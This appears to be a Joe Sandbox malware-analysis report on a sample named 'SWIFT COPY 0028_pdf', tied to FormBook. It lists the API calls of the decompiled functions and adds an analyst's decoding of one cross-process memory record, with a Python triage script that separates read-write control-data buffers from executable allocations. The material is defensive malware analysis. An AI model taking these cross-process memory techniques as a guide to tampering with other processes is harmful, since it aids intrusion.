                                                                                    • Opcode ID: 490f7aec84426cb4dbe89043a2e34d10c176274f5c9429d6debf30b2d99fca14
                                                                                    • Instruction ID: 3e20a081e88062aec1bf572f303dcbc7b6729489f4eac189f63692b33cfc834a
                                                                                    • Opcode Fuzzy Hash: 490f7aec84426cb4dbe89043a2e34d10c176274f5c9429d6debf30b2d99fca14
                                                                                    • Instruction Fuzzy Hash: 8AF04F712552186FEB114FA5EC88EA73B6DFF46755F000129F942C7190DA6098059BB1
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0095AA79
                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0095AA83
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0095AA92
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0095AA99
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0095AAAF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
                                                                                    • Opcode ID: 4d46d4c4b2bd1c24a5ecda614adc889548bddbf87a465fa54fa6710b685625df
                                                                                    • Instruction ID: 1fe8ba1b545fe5091d691b23d44724e7cea4f04d99258e25b2975775d9f73d8e
                                                                                    • Opcode Fuzzy Hash: 4d46d4c4b2bd1c24a5ecda614adc889548bddbf87a465fa54fa6710b685625df
                                                                                    • Instruction Fuzzy Hash: B9F0C2312153186FEB105FA5EC88EA73BADFF4A755F000119FD02C7190DB609C05DBA1
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0095EC94
                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0095ECAB
                                                                                    • MessageBeep.USER32(00000000), ref: 0095ECC3
                                                                                    • KillTimer.USER32(?,0000040A), ref: 0095ECDF
                                                                                    • EndDialog.USER32(?,00000001), ref: 0095ECF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3741023627-0
                                                                                    • Opcode ID: bd20bdadb6dc6d02ce18ee18f1028370e47a65225e2eac9f1cd96b699a220368
                                                                                    • Instruction ID: d096033abf3ab6e5424688e8abe4ea6500b3a9fe194744f3c67fb47ae9f42013
                                                                                    • Opcode Fuzzy Hash: bd20bdadb6dc6d02ce18ee18f1028370e47a65225e2eac9f1cd96b699a220368
                                                                                    • Instruction Fuzzy Hash: 5A01D130910714ABEB289B10DE4EB967BB8FF00706F000559B993A18E0DBF5AA48CB80
                                                                                    APIs
                                                                                    • EndPath.GDI32(?), ref: 0093B0BA
                                                                                    • StrokeAndFillPath.GDI32(?,?,0099E680,00000000,?,?,?), ref: 0093B0D6
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0093B0E9
                                                                                    • DeleteObject.GDI32 ref: 0093B0FC
                                                                                    • StrokePath.GDI32(?), ref: 0093B117
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                    • String ID:
                                                                                    • API String ID: 2625713937-0
                                                                                    • Opcode ID: 2f5f4435f1ae76ddd83e421de977abbfa974d1cd9e36640baecbf9933168f71c
                                                                                    • Instruction ID: 6850d5706c127d847abfb4bd9febbcc467728e1d579d1d29a9f1b494b463ad5e
                                                                                    • Opcode Fuzzy Hash: 2f5f4435f1ae76ddd83e421de977abbfa974d1cd9e36640baecbf9933168f71c
                                                                                    • Instruction Fuzzy Hash: 12F0197002D284EFCB259F65EC4C7A93B64AB01762F088314E566484F0C7348A56EF90
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 0096F2DA
                                                                                    • CoCreateInstance.OLE32(009ADA7C,00000000,00000001,009AD8EC,?), ref: 0096F2F2
                                                                                    • CoUninitialize.OLE32 ref: 0096F555
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInitializeInstanceUninitialize
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 948891078-24824748
                                                                                    • Opcode ID: 77fb4e37a9623f8aaf2a1360ac9dd814ee92dd8080f67ba3cf0ef0b58c9df9da
                                                                                    • Instruction ID: 53e903f2e2265a0e5fd4bc28c56fd7acf2c492b4488fd9202a785b9940510d73
                                                                                    • Opcode Fuzzy Hash: 77fb4e37a9623f8aaf2a1360ac9dd814ee92dd8080f67ba3cf0ef0b58c9df9da
                                                                                    • Instruction Fuzzy Hash: 26A1F9B1104301AFD700EF64D891EAFB7A8EFD8714F00495DF59697192EB70EA49CBA2
                                                                                    APIs
                                                                                      • Part of subcall function 0092660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009253B1,?,?,009261FF,?,00000000,00000001,00000000), ref: 0092662F
                                                                                    • CoInitialize.OLE32(00000000), ref: 0096E85D
                                                                                    • CoCreateInstance.OLE32(009ADA7C,00000000,00000001,009AD8EC,?), ref: 0096E876
                                                                                    • CoUninitialize.OLE32 ref: 0096E893
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 2126378814-24824748
                                                                                    • Opcode ID: 2ab88bb56ca6ff21a043795d71b3e56e5763935188f0847251b22ee2be43c8a6
                                                                                    • Instruction ID: 4e5c6b1bf25f4586886ecf8db1cb289e3ecf64370163de01f7f3c6f84c1180dd
                                                                                    • Opcode Fuzzy Hash: 2ab88bb56ca6ff21a043795d71b3e56e5763935188f0847251b22ee2be43c8a6
                                                                                    • Instruction Fuzzy Hash: C8A145796043119FCB14DF24C484A2EBBE9FF89314F148989F9969B3A1CB31ED45CB91
                                                                                    APIs
                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 009432ED
                                                                                      • Part of subcall function 0094E0D0: __87except.LIBCMT ref: 0094E10B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorHandling__87except__start
                                                                                    • String ID: pow
                                                                                    • API String ID: 2905807303-2276729525
                                                                                    • Opcode ID: 4e77ca3338e1f8deca01535551ef85bee9c963880ef63e401903327636894a5c
                                                                                    • Instruction ID: b37c4234785680d099042a33e9fd4bfdc9be2fcbb6048d6d95a33a1af0c576e0
                                                                                    • Opcode Fuzzy Hash: 4e77ca3338e1f8deca01535551ef85bee9c963880ef63e401903327636894a5c
                                                                                    • Instruction Fuzzy Hash: 9A512C31A1C20296CB15BB34C941F7A3B9CFB80760F74CE68F4E5861E9DF788D94AA45
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,009BDC50,?,0000000F,0000000C,00000016,009BDC50,?), ref: 00964645
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 009646C5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper$__itow__swprintf
                                                                                    • String ID: REMOVE$THIS
                                                                                    • API String ID: 3797816924-776492005
                                                                                    • Opcode ID: e9a83e373128687342dc9592498ba03bb7ff7136c146543ee86255fcf9231146
                                                                                    • Instruction ID: 86372dae35743414df2af3e6db39fbfeeed7fb9204ca1a0141d2ac591c08cd63
                                                                                    • Opcode Fuzzy Hash: e9a83e373128687342dc9592498ba03bb7ff7136c146543ee86255fcf9231146
                                                                                    • Instruction Fuzzy Hash: 1041A374A002199FCF05DFA4C881AAEB7F9FF89304F148469E916AB3A2DB34DD45CB50
                                                                                    APIs
                                                                                      • Part of subcall function 0096430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0095BC08,?,?,00000034,00000800,?,00000034), ref: 00964335
                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0095C1D3
                                                                                      • Part of subcall function 009642D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0095BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00964300
                                                                                      • Part of subcall function 0096422F: GetWindowThreadProcessId.USER32(?,?), ref: 0096425A
                                                                                      • Part of subcall function 0096422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0095BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0096426A
                                                                                      • Part of subcall function 0096422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0095BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00964280
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0095C240
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0095C28D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                    • String ID: @
                                                                                    • API String ID: 4150878124-2766056989
                                                                                    • Opcode ID: ffff4d03a1b4fa6bd984dca34764a2bdb62778f281e191014e65a89fb9d2f284
                                                                                    • Instruction ID: 2effa3f4fb9228cce505fbef9787686a7f3991e821a873b9e294d8d54429f0d8
                                                                                    • Opcode Fuzzy Hash: ffff4d03a1b4fa6bd984dca34764a2bdb62778f281e191014e65a89fb9d2f284
                                                                                    • Instruction Fuzzy Hash: 95413A72900218BFDB10DFA4CD81BEEB7B8AF49700F104095FA55B7181DA71AE49DBA1
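The record above is the one an analyst should read closely, because it is what drives the "Writes to foreign memory regions" class of signatures for this sample. Decoding its arguments: OpenProcess is called with access 0x438, which is PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION; VirtualAllocEx is called with flAllocationType 0x1000 (MEM_COMMIT) and flProtect 0x4 (PAGE_READWRITE), not an executable protection; the 00001073 and 00001004 visible in the subcall stack slots are LVM_GETITEMTEXTW and LVM_GETITEMCOUNT, and the two direct SendMessageW calls use 0x1104 and 0x1111, which for a SysTreeView32 control are TVM_GETITEMRECT and TVM_HITTEST. That combination (allocate a read-write buffer in the window's owning process, write a request structure into it, send a control message, read the result back) is the standard way to fetch list-view or tree-view item data from a control that belongs to another process, since those messages need the buffer in the target's address space; the AutoIt runtime's ControlListView/ControlTreeView built-ins are implemented this way, so compiled AutoIt scripts trigger such signatures even when the script itself injects no code. This record alone therefore neither confirms nor weakens the FormBook verdict, which rests on the other signatures in the report. The script below is an added triage helper for this kind of record, not Joe Sandbox, AutoIt or sample code; it parses the API bullets as printed above (the sample input is copied from this record), decodes the access mask, protection and message numbers, and separates a read-write data buffer from an executable allocation, which is the case to escalate. The constant tables are the documented Win32 values; the message table is limited to the control classes named in this report.

```python
"""Triage helpers for the "APIs" bullets of a Joe Sandbox function record.

Added example; not Joe Sandbox, AutoIt or sample code.  Parses the API
bullets of one record, decodes the arguments an analyst checks when window
messages are combined with cross-process memory calls, and classifies the
record as a data-buffer read or an executable allocation.
"""
import re
from dataclasses import dataclass

# Copied from the report record above: SendMessageW plus the OpenProcess /
# VirtualAllocEx / WriteProcessMemory / ReadProcessMemory subcall bullets.
SAMPLE_RECORD = """\
• Part of subcall function 0096430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0095BC08,?,?,00000034,00000800,?,00000034), ref: 00964335
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0095C1D3
• Part of subcall function 009642D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0095BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00964300
• Part of subcall function 0096422F: GetWindowThreadProcessId.USER32(?,?), ref: 0096425A
• Part of subcall function 0096422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0095BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0096426A
• Part of subcall function 0096422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0095BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00964280
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0095C240
"""

# "Api.Module(args), ref: ADDR" or "Api.Module ref: ADDR" (no argument list).
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class Call:
    api: str
    module: str
    args: list      # int for 8-digit hex slots, "?" or a string literal otherwise
    ref: int        # address of the call instruction
    subcall: bool   # True for "Part of subcall function" bullets


def parse_record(text):
    """Turn the API bullets of one record into Call objects, in report order.

    The report prints stack slots beyond the formal parameters, so only the
    first N positions are real arguments (N from the API prototype).
    """
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [int(a, 16) if HEX8.match(a) else a for a in raw.split(",") if a]
        calls.append(Call(m.group("api"), m.group("module"), args,
                          int(m.group("ref"), 16), "Part of subcall" in line))
    return calls


# OpenProcess desired-access bits (winnt.h).
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
# VirtualAllocEx flProtect values (winnt.h); any EXECUTE_* bit means code can run there.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
EXECUTE_BITS = 0x10 | 0x20 | 0x40 | 0x80
MEM_COMMIT = 0x1000


def decode_access(mask):
    return [name for bit, name in PROCESS_ACCESS.items() if mask & bit]


def decode_protect(value):
    return PAGE_PROTECT.get(value & 0xFF, "unknown(0x%X)" % value)


# Control messages by window class (commctrl.h / winuser.h).  Numbers overlap between
# control families (0x1004 is LVM_GETITEMCOUNT for a list view but MCM_SETMAXSELCOUNT
# for a month calendar), so the class string from the record is needed to name them.
WM_USER, LVM_FIRST, TV_FIRST, MCM_FIRST = 0x0400, 0x1000, 0x1100, 0x1000
MESSAGES = {
    "SysListView32": {LVM_FIRST + 4: "LVM_GETITEMCOUNT", LVM_FIRST + 115: "LVM_GETITEMTEXTW"},
    "SysTreeView32": {TV_FIRST + 4: "TVM_GETITEMRECT", TV_FIRST + 17: "TVM_HITTEST"},
    "SysMonthCal32": {MCM_FIRST + 2: "MCM_SETCURSEL", MCM_FIRST + 9: "MCM_GETMINREQRECT"},
    "msctls_updown32": {WM_USER + 101: "UDM_SETRANGE", WM_USER + 105: "UDM_SETBUDDY"},
    "Listbox": {0x0180: "LB_ADDSTRING", 0x0186: "LB_SETCURSEL"},
}


def message_name(msg, control_class):
    return MESSAGES.get(control_class, {}).get(msg, "0x%04X" % msg)


def window_messages(calls, control_class):
    """Name the message number (2nd argument) of each direct SendMessageW call."""
    return [message_name(c.args[1], control_class) for c in calls
            if c.api == "SendMessageW" and not c.subcall
            and len(c.args) > 1 and isinstance(c.args[1], int)]


def classify_cross_process(calls):
    """Data buffer for a control message, or an allocation that can hold code?"""
    names = {c.api for c in calls}
    if not {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory"} <= names:
        return "no cross-process write"
    va = next(c for c in calls if c.api == "VirtualAllocEx")
    protect = va.args[4] if len(va.args) > 4 and isinstance(va.args[4], int) else None
    if protect is not None and protect & EXECUTE_BITS:
        return "executable allocation (%s): escalate as candidate code injection" % decode_protect(protect)
    if {"ReadProcessMemory", "SendMessageW"} <= names:
        return "read-write buffer for a cross-process window message (control text read, not code)"
    return "read-write allocation: inspect the written data"


if __name__ == "__main__":
    calls = parse_record(SAMPLE_RECORD)
    op = next(c for c in calls if c.api == "OpenProcess")
    va = next(c for c in calls if c.api == "VirtualAllocEx")
    print("OpenProcess access :", " | ".join(decode_access(op.args[0])))
    print("VirtualAllocEx     :", "MEM_COMMIT" if va.args[3] == MEM_COMMIT else hex(va.args[3]),
          decode_protect(va.args[4]))
    print("SendMessageW (tree):", window_messages(calls, "SysTreeView32"))
    print("Verdict            :", classify_cross_process(calls))
```

Run it on the bullets of any record that lists VirtualAllocEx; the verdict line is what to compare across records. The MonthCal, up-down and Listbox records further down this report decode with the same table (MCM_GETMINREQRECT/MCM_SETCURSEL, UDM_SETBUDDY/UDM_SETRANGE, LB_ADDSTRING/LB_SETCURSEL) and are ordinary GUI control setup within the sample's own process.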
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,009BDC00,00000000,?,?,?,?), ref: 0098A6D8
                                                                                    • GetWindowLongW.USER32 ref: 0098A6F5
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0098A705
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long
                                                                                    • String ID: SysTreeView32
                                                                                    • API String ID: 847901565-1698111956
                                                                                    • Opcode ID: 3a04fa3068a2d73d988e82875f49ac0242726e4ee160e637e32e42e6dd42de58
                                                                                    • Instruction ID: 3b65ee46edc3183bffa6d18da00182922da5fbfa716ac6269db8694ffa77415d
                                                                                    • Opcode Fuzzy Hash: 3a04fa3068a2d73d988e82875f49ac0242726e4ee160e637e32e42e6dd42de58
                                                                                    • Instruction Fuzzy Hash: F8319031505206AFEB119E34CC45BEA7BA9FF49338F244716F975932E1D770AC509B90
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0098A15E
                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0098A172
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0098A196
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window
                                                                                    • String ID: SysMonthCal32
                                                                                    • API String ID: 2326795674-1439706946
                                                                                    • Opcode ID: 259c5251d6d6d4e47b731469e23b15ae3241d0bf4f1416c448674c7db400dfd1
                                                                                    • Instruction ID: 20324cf7aea0d02f8973e226011fd7e50bf6db6c1793379be37f579704f6dc9b
                                                                                    • Opcode Fuzzy Hash: 259c5251d6d6d4e47b731469e23b15ae3241d0bf4f1416c448674c7db400dfd1
                                                                                    • Instruction Fuzzy Hash: EC21D132514218ABEF119F94CC86FEA3B79EF88714F100215FA55AB2D0D6B5AC50DB90
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0098A941
                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0098A94F
                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0098A956
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                    • String ID: msctls_updown32
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00989A30
                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00989A40
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00989A65
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: MessageSend$MoveWindow
                                                                                    • String ID: Listbox
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0098A46D
                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0098A482
                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0098A48F
                                                                                    Strings
                                                                                    Memory Dump Source
